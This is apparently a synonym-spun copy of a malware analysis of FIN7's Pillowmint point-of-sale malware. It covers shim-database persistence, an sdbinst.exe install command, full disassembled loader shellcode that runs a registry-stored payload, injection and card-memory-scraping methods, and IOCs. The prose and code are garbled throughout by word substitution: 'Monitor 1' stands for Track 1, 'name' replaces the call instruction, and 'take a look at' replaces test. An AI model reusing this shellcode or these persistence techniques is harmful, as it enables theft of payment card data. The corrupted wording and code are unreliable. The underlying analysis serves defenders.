FIN7’s Monkey Thief Trustwave
On this weblog, we take an in-depth technical take a look at Pillowmint malware samples acquired from our incident response investigations. Pillowmint is point-of-sale malware able to capturing Monitor 1 and Monitor 2 bank card information. We got here throughout Pillowmint a few occasions within the final yr and there may be not a lot info round on it. The malware has been attributed to the FIN7 group that has been actively attacking the hospitality and restaurant trade for the previous three years. It is a infamous financially-motivated cybercriminal group additionally known as the Carbanak group, after the Carbanak malware which it has used prior to now.
Evaluation: Set up
Pillowmint is normally put in by way of a malicious shim database which permits the malware to persist within the system.
Shim databases are utilized by Home windows Software Compatibility Framework – created by Microsoft in order that legacy Home windows purposes will nonetheless work on newer Home windows working methods. That is completed by overlaying code to a goal course of which is normally a legacy utility. This may allow that utility to run in a Home windows working system atmosphere that’s not designed for. A extra elaborate rationalization of shimming has been revealed in a Tech Neighborhood article from Microsoft.
By putting in a malicious shim an attacker can leverage this Home windows function and use it to realize persistence in a compromised system.
| sdbinst.exe -q -p sdb4F19.sdb
The place sdb4F19.sdb is the malicious shim database |
To put in a malicious shim database, the attacker invokes a Microsoft utility referred to as sdbinst.exe by way of a PowerShell script. For instance:
When the malicious shim database is registered, the SDB file is copied to the shim database path at %windirpercentAppPatchCustomCustom64{GUID.sdb}. The shim database can be added to the Window’s Software Compatibility Program Stock and a registry key created HKLMSoftwareMicrosoftWindows NTCurrentVersionAppCompatFlagsCustomservices.exe Worth Identify: {GUID}.sdb
Under is an instance XML dump of the shim database. The PATCH_BITS factor comprises a kind discipline ‘hex’. This chunk of hexadecimal information comprises the SHELLCODE and the relative digital tackle (RVA) within the goal course of the place the code is to be patched. The goal Home windows utility on this case is companies.exe.
The relative digital tackle (RVA) in companies.exe that the malware can be patching is at RVA 0x0000F93B. That is the RVA of companies.exe!ScRegisterTCPEnpoint perform. This may trigger the malware shellcode to execute when the aforementioned companies.exe perform is named.
Mainly, the shellcode’s primary objective is to launch different code saved within the registry key REGISTRYSOFTWAREMicrosoftDRM. Under is the disassembled shellcode and commentaries for readers.
;API hashes
%outline RtlInitUnicodeString 0xb67242fd
%outline NtQueryValueKey 0x50df3b21
%outline NtAllocateVirtualMemory 0x69a0287f
%outline NtFreeVirtualMemory 0x69a0287f
%outline NtClose 0x9bd4442f
%outline NtOpenKey 0xed686dc1
%outline NtCurrentProcess 0xFFFFFFFFFFFFFFFF
; stack variables
%outline ObjAttr 0x0f
%outline hKey 0x7f
%outline BufLen 0x67
%outline Buf 0x77
%outline RegionSize 0x19
primary:
push rbp
push rbx
push rdi
lea rbp, [rsp – 0x47] ; set new body
sub rsp, 0x90 ; allocate some stack house 0x49 (0x90-0x47)
xor edi, edi
mov ecx, RtlInitUnicodeString ; discover RtlInitUnicodeString
mov qword ptr [rbp + 0x6f], 0x34 ; var_0x6f = 0x34
mov [rbp + BufLen], edi ; BufLen = 0
name GetProcAddressByHash
mov rbx, rax ; rbx = RtlInitUnicodeString
name setupdata ; rax = L”REGISTRYMACHINEMicrosoftDRM”
; x64 fastcall rcx, rdx, r8, r9
lea rcx, [rbp-1] ; UNICODE_STRING regPath
mov rdx, rax ; rdx = L”REGISTRYMACHINEMicrosoftDRM”
name rbx ; RtlInitUnicodeString(&tmpVar, L”REGISTRY…”)
lea rax, [rbp-1] ; rax=®Path
lea ebx, [rdi+0x40] ; ebx=attr
mov ecx, NtOpenKey
name GetProcAddressByHash ; NtOpenKey
; NtOpenKey(keyHandle=rcx, desiredAccess=rdx, objAttr=r8);
lea r8, [rbp + ObjAttr] ; objAttr (0x0f)
lea rcx, [rbp + hKey] ; hKey (0x7f)
; OBJECT_ATTRIBUTES objAttr; // sizeof(OBJECT_ATTRIBUTES) 24
; objAttr.Size = 0x30; // +Zero sizeof(OBJECT_ATTRIBUTES)
; objAttr.RootDirectory = HANDLE; // +8
; objAttr.ObjectName = ®Path; // +10 UNICODE_STRING
; objAttr.Attributes = attr; // +18 ULONG
; objAttr.SecurityDescriptor = NULL; // +20
; objAttr.SecurityQualityOfService = NULL; // +28
mov dword ptr [rbp + ObjAttr], 0x30 ; Size: sizeof(OBJECT_ATTRIBUTES) (0x0f)
mov [rbp + ObjAttr + 0x8], rdi ; RootDirectory
mov [rbp + ObjAttr + 0x18], ebx ; Attributes
mov [rbp + ObjAttr + 0x10], rax ; ObjectName
mov [rbp + ObjAttr + 0x20], rdi ; SecurityDescriptor
mov [rbp + ObjAttr + 0x28], rdi ; SecurityQualityOfService
mov edx, 0x20019 ; desiredAccess
name rax ; NtOpenKey
take a look at eax, eax ; verify return worth of NtOpenKey
js finish ; if < Zero goto finish
mov ecx, NtQueryValueKey ; discover NtQueryValueKey perform
name GetProcAddressByHash ; rax = NtQueryValueKey
; NtQueryValueKey(hKey=rcx, valueName=rdx, keyValueInfoClass=r8,
; keyValueInfo=r9, size=stack, resultLength=stack)
lea rcx, [rbp + BufLen] ; rcx = &bufLen (0x67)
lea r8d, [rdi + 2]
mov [rsp + 0x28], rcx ; [rsp + 0x28] = [rbp + 0x67]
mov rcx, [rbp + hKey] ; hKey
lea rdx, [rbp – 0x11] ; valueName
xor r9d, r9d ; keyValueInfo = 0
mov [rsp + 0x20], edi ; size?? (edi ought to be 4)
name NtQueryValueKey
mov r11d, [rbp + BufLen] ; r11d = resultLength
take a look at r11d, r11d ; if resultLength == 0:
jz closekey ; goto closekey
mov ecx, NtAllocateVirtualMemory
mov [rbp + Buf], rdi
mov [rbp – RegionSize], rdi
name GetProcAddressByHash ; discover NtAllocateVirtualMemory
; NtAllocateVirtualMemory(hProc=rcx, baseAddress=rdx, zeroBits=r8,
; regionSize=r9, allocType=stack1, defend=stack2)
lea r9, [rbp – RegionSize] ; regionSize: r9 = [rbp – 0x19]
lea rdx, [rbp + Buf] ; baseAddress: rdx = pBuf
xor r8d, r8d ; zeroBits: r8 = 0
or rcx, NtCurrentProcess ; hProc: rcx = NtCurrentProcess
mov [rsp + 0x28], ebx ; defend
mov dword ptr [rsp + 0x20], 0x3000 ; allocType: MEM_COMMIT | MEM_RESERVE
name rax ; NtAllocateVirtualMemory
take a look at eax, eax ; if NtAllocateVirtualMemory() < 0
js closekey ; goto closekey
mov rbx, [rbp + Buf] ; baseAddr: rbx = pBuf
take a look at rbx, rbx ; if pBuf == 0:
jz closekey ; goto closekey
; Question key once more now that we now have allocate buffer
mov ecx, NtQueryValueKey
name GetProcAddressByHash
; NtQueryValueKey(hKey=rcx, valueName=rdx, keyValueInfoClass=r8,
; keyValueInfo=r9, size=stack1, resultLength=stack2)
lea rcx, [rbp + BufLen] ; size
lea r8d, [rdi + 2]
mov [rsp + 0x28], rcx ; size
mov ecx, [rbp + BufLen] ; resultLength
lea rdx, [rbp – 0x11] ; valueName
mov [rsp + 0x20], ecx ; resultLength
mov rcx, [rbp + hKey] ; hKey
mov r9, rbx ; keyValueInfo
name rax ; NtQueryValueKey
take a look at eax, eax ; if NtQueryValueKey() < 0:
js closekey ; goto closekey
mov rax, [rbp + Buf] ; rax = pData
add rax, 0x30 ; name pData[0x30]
name rax ; execute pData[0x30]
; cleanup
mov ecx, NtFreeVirtualMemory
mov [rbp + BufLen], edi ; dataLength
name GetProcAddressByHash
lea r8, [rbp + BufLen] ; dataSize
lea rdx, [rbp + Buf] ; pData
mov r9d, 0x8000 ; MEM_RELEASE
or rcx, 0xFFFFFFFFFFFFFFFF ; NtCurrentProcess
; NtFreeVirtualMemory(hProc=rcx, baseAddr=rdx, regionSize=r8, freeType=r9)
name rax
closekey:
mov ecx, NtClose
name GetProcAddressByHash
mov rcx, [rbp + hKey] ; hKey
name rax ; NtClose(hKey)
finish:
xor eax, eax
add rsp, 0x90
pop rdi
pop rbx
pop rbp
retn
setupdata:
nop
nop
nop
name getdataaddr ; return Knowledge in rax
Knowledge:
reg db ”, 0, ‘R’, 0, ‘E’, 0, ‘G’, 0, ‘I’, 0, ‘S’, 0, ‘T’, 0, ‘R’, 0, ‘Y’, 0,
db ”, 0, ‘M’, 0, ‘A’, 0, ‘C’, 0, ‘H’, 0, ‘I’, 0, ‘N’, 0, ‘E, 0,
db ”, 0, ‘S’, 0, ‘O’, 0, ‘F’, 0, ‘T’, 0, ‘W’, 0, ‘A’, 0, ‘R’, 0, ‘E’ 0,
db ”, 0, ‘M’, 0, ‘i’, 0, ‘c’, 0, ‘r’, 0, ‘o’, 0, ‘s’, 0, ‘o’, 0, ‘f’, 0, ‘t’ 0,
db ”, 0, ‘D’, 0, ‘R’, 0, ‘M’
db 0, 0
getdataaddr:
pop rax ; save ret tackle in rax
retn
As talked about, the registry key (HKLMSOFTWAREMicrosoftDRM) is the place the malicious payload is saved. On this case, that is the Pillowmint Trojan. Pillowmint is saved and compressed within the registry key. With the intention to decompress and launch it, small shellcode is executed to decompress and allocate it into the mother or father course of reminiscence house. Execution is then transferred to the payload.
Payload: Pillowmint
Pillowmint injects its code to svchost.exe, however as a substitute of utilizing generally monitored syscalls corresponding to VirtualAlloc and WriteProcessMemory, It makes use of a mapping injection method that makes use of CreateMapping, MapViewOfFIle, NtQueueApcThread, ResumeThread, CreateRemoteThread syscalls for stealthier course of injection.
This malware is able to logging its personal exercise. This log is dropped within the path: “%WinDirpercentSystem32MUI” or “%WinDirpercentSystem32Sysvols” relying on the variant and it makes use of the file title log.log. It has Eight completely different ranges of logging:
Stage 0 – No logging
Stage 1 (CRITICAL) – it logs solely crucial actions corresponding to exceptions, that is logged to the file named “crucial.log” within the path “%WinDirpercentsysvols”
Instance content material of crucial.log
context:
RIP: 0x7FEEC83F51B
RAX: 0x3F
RCX: 0x0
RDX: 0x0
RBX: 0x7FEEC830000
RDI: 0x0
RSI: 0x0
RBP: 0x2CF728
RSP: 0x2CEF30
exception data:
ExceptionCode: C0000005
ExceptionFlags: 0
ExceptionAddress: 7FEEC83F51B
module data: EC830000
startWithProxy: executing SEH __except block for
Stage 2 (ERROR) – errors encountered
Stage 3 (WARNING) – logs a warning when thread deal with is empty
Stage 4 (INFO) – log all info such malware’s model quantity, thread info, command executed, course of the place bank card information was discovered. The log is written to the file log.log in in the trail “%WinDirpercentsysvols”
Instance content material of log.log with degree Four logging:
LOGGER_LEVEL_INFO TS1528942911
New course of discovered: .exe
LOGGER_LEVEL_INFO TS1528942911
Dumping threads for .exe
LOGGER_LEVEL_INFO TS1528942911
Thread 0 (C:WindowsSYSTEM32ntdll.dll) tackle = 181504
LOGGER_LEVEL_INFO TS1528942911
New location discovered: .exe + 1a31b within the course of .exe
LOGGER_LEVEL_INFO TS1528942911
1 new stuff written
LOGGER_LEVEL_INFO TS1528942911
New course of discovered: .exe
LOGGER_LEVEL_INFO TS1528942912
New course of discovered: .exe
Stage 5 (DEBUG_INFO) – this degree of logging contains the software assist snapshot worth and the pid e.g.
LOGGER_LEVEL_DEBUG_INFO TS1528949889
updateProcessesList
LOGGER_LEVEL_DEBUG_INFO TS1528950004
TH32CS: 87, pid: 228
Stage 6 (DEBUG) – not used
Stage 7 (TRACE) – not used
Stage 8 (UNKNOWN) – not used
Reminiscence Scraper
There are two variations that we now have encountered to date. Relying on the Pillowmint model, the malware could include three primary threads. The older model has three threads:
- Reminiscence Scraper
- Course of checklist updater
- Course of command
Thread 1: Credit score Card Knowledge – Reminiscence Scraper
This thread first sleeps for 10 seconds earlier than a name again to the thread’s primary perform.
Like some other typical PoS malware, Pillowmint iterates an inventory of processes and course of them two at a time. it makes use of the API OpenProcess() utilizing the PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to acquire a deal with then reads the reminiscence’s content material through ReadProcessMemory() API two chunks at a time. It then captures Monitor 1 and Monitor 2 bank card (CC) information. Relying on the Pillowmint model, it could encrypt the stolen CC information with AES encryption algorithm + Base64. Different variations may encode the plain Credit score Card Knowledge it with Base64. That is then written to a file named “ldb_e.log” in Home windows System listing.
The AES key used for encryption can be obscured and could also be decoded with a easy algorithm:
decode_byte = encoded_byte –(index * 3) – 2
Monitor 1 and Monitor 2 information are verified utilizing the Luhn Algorithm
Thread 2: Replace Course of Listing
Each 6 seconds the malware iterates by way of working processes and updates its checklist for it to seize afterward:
Thread 3: Course of Instructions
The older model we investigated got here with remnants of command and management performance. This third thread reads for attacker’s command from both a registry key:
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesTcpipParametersInterfaces
command =
or from a file:
%WinDirpercentsysvolscommands.txt
There are solely two instructions:
Command 1
s: or S: – terminate malware course of
if ( pCommand[1] == ‘:’ && !((*pCommand – 0x53) & 0xDF) )// if command is “s:” or “S:” then uninstall
{
output.capability = 15i64;
output.len = 0i64;
output.buf[0] = 0;
F7_StrAssign(&output, “exit requested…”, 0x11ui64);
This command additionally uninstalls a service named “IntelDevMonServer” and deletes a file from the trail %APPDATApercentInteldevmonsrv.exe. This file nevertheless was not put in by the malware. It’s in all probability a code remnant from the unique malware supply, left by the malware creator.
Command 2
crash – simulate crash
Because the title implies, it simulates its personal course of to crash.
pcrash = aCrash[crashLen++];
if ( pcrash != pCommand[crashLen – 1] )
break;
if ( crashLen == 6 )
{
logString.capability = 15i64;
logString.len = 0i64;
logString.buf[0] = 0;
F7_StrAssign(&logString, “simulating crash”, 0x10ui64);
EnterCriticalSection(&CriticalSection);
Ultimate remarks
An analogy is that Pillowmint is sort of a monkey thief. It simply grabs all the cash from the sufferer and locations the stolen items to at least one facet, to be later collected by the legal. Pillowmint doesn’t exfiltrate its stolen bank card information log information. This is sensible as a result of normally attackers have already got full management of the compromised system and the info is exfiltrated by different malicious purposes put in by the attacker. Nonetheless, the draw back is that this leaves a footprint that an investigator can later simply uncover.
Though using a shim database for persistence in a compromised system is just not new, it’s uncommon to search out malware that makes use of this technique. FIN7 actors have used artistic methods and complex assaults prior to now, and this demonstrates it once more.
IOCs
Pattern 1: 632BD550540C822059576FB25EA7E82CFD51823BD26B95723899FC8E123C1DEA
Pattern 2: F59E443DCAA2D92277D403FFE57A639CADF46932E61F33297A68BE025EC5A137
Folders: “%WinDirpercentSystem32MUI ”
“%WinDirpercentSystem32Sysvols ”
Registry Key:
HKLMREGISTRYSOFTWAREMicrosoftDRM
